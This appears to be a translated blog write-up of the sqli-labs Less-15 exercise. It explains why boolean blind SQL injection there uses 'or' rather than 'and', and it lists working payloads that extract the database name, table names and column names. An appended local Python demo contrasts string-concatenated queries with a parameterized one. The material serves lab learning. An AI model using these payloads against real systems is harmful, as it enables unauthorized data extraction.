
About sqli-labs Less-15: using `or` instead of `and`

2022-07-07 12:23:00 hcjtn

Following the earlier approach, I first tried error-based injection and found that no error message is output. Looking at the source code shows that there is no output statement at all, so blind injection has to be used.

(Using Less-15 as an example)

  • Determine the length of the database name: `'or (length(database()))=8-- q`

  • Determine the database name: `'or (ascii(substr(database(),1,1)))=115-- q`

  • Determine the table name: `'or (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101-- q`

  • Determine the column name: `'or (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)))=105-- q`

In the earlier Less-8 and Less-9 we used `and`, but in Less-15 we use `or`. Let's look at the source code of the two levels (taking Less-9 and Less-15 as examples):

[Image not preserved]

Now let's put these two statements together :

[Image not preserved]

It's not hard to see that if we used `and` in Less-15, the statement would become:

[Image not preserved]

That obviously does not work, because we don't know the value of `username`. If we use `or`, the condition as a whole holds whenever the expression that follows it is true.

In Less-9, `id=1` is true, so `and` can be used to join the statements.
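The `and`/`or` difference described above can be reproduced locally. This is an added example, not code from the original post or from sqli-labs. Assumptions: the two query shapes (the post's screenshots did not survive), SQLite standing in for MySQL, a constructed `users` row, hypothetical function names, and `1=1`/`1=2` standing in for the conditions being tested.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's users table (SQLite, not MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('1', 'Dumb', 'Dumb')")
    return db

def lookup_by_id(db, id_):
    # Assumed Less-9 shape: a single concatenated condition on id.
    sql = "SELECT username FROM users WHERE id='" + id_ + "' LIMIT 1"
    return db.execute(sql).fetchone() is not None

def login_concat(db, uname, passwd=""):
    # Assumed Less-15 shape: concatenated username AND password.
    sql = ("SELECT username FROM users WHERE username='" + uname +
           "' AND password='" + passwd + "' LIMIT 1")
    return db.execute(sql).fetchone() is not None

def login_param(db, uname, passwd=""):
    # Hardened form: input is bound as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username=? AND password=? LIMIT 1"
    return db.execute(sql, (uname, passwd)).fetchone() is not None

def responses(query, db, prefix, op):
    # Sends the post's payload shape with a true and a false condition and
    # returns (row_returned_for_true, row_returned_for_false).
    return tuple(query(db, f"{prefix}' {op} ({cond})-- q")
                 for cond in ("1=1", "1=2"))

if __name__ == "__main__":
    db = make_db()
    # id='1' is already true, so `and` lets the response follow the condition.
    print("Less-9  and:", responses(lookup_by_id, db, "1", "and"))
    # username is unknown, so username='' is false and `and` is always false.
    print("Less-15 and:", responses(login_concat, db, "", "and"))
    # With `or`, the response follows the condition even though username is unknown.
    print("Less-15 or: ", responses(login_concat, db, "", "or"))
    # The bound parameter is compared as a literal string: no difference to observe.
    print("bound   or: ", responses(login_param, db, "", "or"))
```

With bound parameters the two responses are identical, so the page no longer leaks the truth of the condition.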


Copyright notice
This article was written by [hcjtn]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/02/202202130618271890.html
